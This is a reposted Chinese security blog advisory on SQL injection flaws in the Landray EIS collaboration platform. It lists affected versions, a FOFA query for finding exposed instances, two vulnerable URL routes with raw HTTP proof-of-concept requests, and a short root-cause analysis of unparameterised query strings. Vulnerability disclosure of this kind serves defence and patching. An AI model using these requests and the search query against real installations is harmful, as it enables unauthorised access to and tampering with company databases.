【未公开漏洞】蓝凌EIS存在多处SQL注入

admin 2024年4月10日12:52:37评论49 views字数 1513阅读5分2秒阅读模式
免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责。

漏洞描述

蓝凌EIS智慧协助平台存在多处SQL注入。

蓝凌eis智慧协同平台是由深圳市微达软件有限公司开发的用于企业在知识,协同,项目管理等场景的OA系统。

影响版本

7.1.1.4—8.5.1.4

fofa语法

app="Landray-EIS智慧协同平台"

漏洞复现

路由1:

http://127.0.0.1:80/mobileapp/address/mobileposition.aspx?search=*

POC:

GET mobileapp/address/mobileposition.aspx?search=* HTTP/1.1Host: 127.0.0.1:80Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

【未公开漏洞】蓝凌EIS存在多处SQL注入

路由2:
http://127.0.0.1:80/mobileapp/Task/task_view.aspx?id=%27=

GET mobileapp/Task/task_view.aspx?id=%27= HTTP/1.1Host: 127.0.0.1:80Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

【未公开漏洞】蓝凌EIS存在多处SQL注入

漏洞分析

漏洞点1:

SQL注入的风险主要集中在直接将用户输入(通过Request.QueryString获取)拼接到SQL查询语句中,没有进行预处理或使用参数化查询。

【未公开漏洞】蓝凌EIS存在多处SQL注入

漏洞点2:

在于从Request.QueryString["id"]直接获取的id值被用于构建SQL查询语句而未进行任何过滤或参数化处理这意味着,如果攻击者通过修改URL中的id参数值为恶意的SQL代码片段,他们可能能够执行未授权的数据库操作,如访问、修改或删除数据。

【未公开漏洞】蓝凌EIS存在多处SQL注入

原文始发于微信公众号(jacky安全):【未公开漏洞】蓝凌EIS存在多处SQL注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月10日12:52:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【未公开漏洞】蓝凌EIS存在多处SQL注入http://cn-sec.com/archives/2644639.html

发表评论

匿名网友 填写信息